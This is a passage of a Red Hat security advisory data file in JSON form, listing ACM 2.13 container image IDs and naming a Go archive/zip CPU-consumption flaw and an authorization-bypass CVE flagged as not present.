"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2026-21721",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2026-01-27T10:02:34.317952+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
